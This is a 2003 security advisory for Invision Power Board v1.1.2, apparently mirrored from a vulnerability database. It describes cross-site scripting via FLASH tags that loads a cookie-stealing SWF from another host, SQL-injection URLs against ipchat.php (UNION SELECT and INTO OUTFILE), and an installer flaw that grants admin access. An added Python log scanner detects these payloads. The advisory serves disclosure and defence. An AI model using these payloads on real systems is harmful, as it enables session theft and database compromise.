Invision Power Board v1.1.2

2003-07-13T00:00:00
ID SECURITYVULNS:DOC:4823
Type securityvulns
Reporter Securityvulns
Modified 2003-07-13T00:00:00

Description

===========================================
Security REPORT Invision Power Board v1.1.2
===========================================

Product:         Power Board v1.1.2 (maybe earlier versions)
Vulnerabilities: cross-site scripting, SQL injection, install and admin issues, OS command execution
Vuln.-Classes:   check out http://www.owasp.org/asac/ for more detailed information on "Attack Components"
Vendor:          http://www.invisionboard.com/
Vendor-Status:   contacted "info@invisionpower.com" on Jul. 11th 2003
Vendor-Patches:  http://www.invisionboard.com/downloads/chat.zip

Exploitable:
Local:  ---
Remote: YES

============
Introduction
============

Visit "http://www.invisionboard.com/" for additional information.

=====================
Vulnerability Details
=====================

1) CROSS-SITE-SCRIPTING

OBJECT: Post.php

DESCRIPTION: By using [FLASH=h,w][/FLASH] tags within a posting (the post textarea) it is possible to execute arbitrary client-side scripts, which can lead to cookie theft.

The usage of flash tags is allowed by default in "conf_global.php":
------
$INFO['allow_flash'] = '1';
------

EXAMPLE-Content:
------
hey dude, whats up?
[FLASH=2,2]http://anotherhost.ext/cookie-thief.swf[/FLASH]
cu, jonnie
------

2) SQL-INJECTION

OBJECT: ipchat.php

DESCRIPTION: Depending on the MySQL version and/or drivers, it is possible to alter the result of the SQL queries issued by this script.

EXAMPLE (MySQL > 4):
------
http://localhost/ibo/ipchat.php?password=1&username=9x%2527+union+select+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f+
------

EXAMPLE (with FILE permission set):
------
http://localhost/ibo/ipchat.php?password=1&username=admin%2527into+outfile+%2527[fullpath]%2527--+
------
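As an added detection example (not part of the advisory), the following Python script scans web-server access-log lines for requests to ipchat.php whose parameters, once the nested URL-encoding used in the URLs above is undone (%2527 decodes to %27 and then to a single quote), contain SQL keywords or a stray quote; the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not taken from any real server):
# two requests shaped like the advisory's examples plus one benign login.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jul/2003:10:01:02 +0200] "GET /ibo/ipchat.php?password=1&username=9x%2527+union+select+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f+ HTTP/1.0" 200 512
10.0.0.6 - - [13/Jul/2003:10:02:15 +0200] "GET /ibo/ipchat.php?password=1&username=admin%2527into+outfile+%2527[fullpath]%2527--+ HTTP/1.0" 200 512
10.0.0.7 - - [13/Jul/2003:10:03:44 +0200] "GET /ibo/ipchat.php?password=secret&username=jonnie HTTP/1.0" 200 512
"""

LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
SQLI_PATTERNS = [
    ("union-select", re.compile(r"union\s+select", re.I)),
    ("into-outfile", re.compile(r"into\s+outfile", re.I)),
    ("single-quote", re.compile(r"'")),
]

def decode_fully(value, max_rounds=3):
    """Undo nested URL-encoding: %2527 -> %27 -> ' (the advisory's URLs are double-encoded)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_ipchat_request(target):
    """Return 'param:marker' strings for suspicious values in an ipchat.php request."""
    parts = urlsplit(target)
    if not parts.path.endswith("/ipchat.php"):
        return []
    findings = []
    # parse_qs performs one decoding pass; decode_fully strips any further layers
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            value = decode_fully(raw)
            findings += [f"{name}:{label}" for label, pat in SQLI_PATTERNS if pat.search(value)]
    return findings

def scan_log(text):
    """Return (request target, findings) for every flagged line of an access log."""
    flagged = []
    for line in text.splitlines():
        match = LOG_RE.search(line)
        if match:
            findings = check_ipchat_request(match.group("target"))
            if findings:
                flagged.append((match.group("target"), findings))
    return flagged
```

Running scan_log(SAMPLE_LOG) flags the first two sample lines and leaves the benign login alone.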

3) INSTALLER-, ADMIN-ISSUES

If for some reason (permissions, directory moving) the installer lockfile (install.lock) is missing, any user can use the "sm_install.php" script.

Once administrator, one is able to:

A) execute arbitrary SQL queries through "admin.php/act=mysql/code=runsql/query=sq"
B) upload arbitrary files (including programs and scripts) into the "emoticons" directory.

... thus leading to a "total" compromise of the HTTP server's account.

=======
Remarks
=======


====================
Recommended Hotfixes
====================

Disallow flash tags in "conf_global.php" (see the allow_flash setting above).
Check that the installer lockfile is present.

Apply the vendor software patch(es).

EOF

Martin Eiszner / (c) 2003 WebSec.org

=======
Contact
=======

WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE

mei@websec.org
http://www.websec.org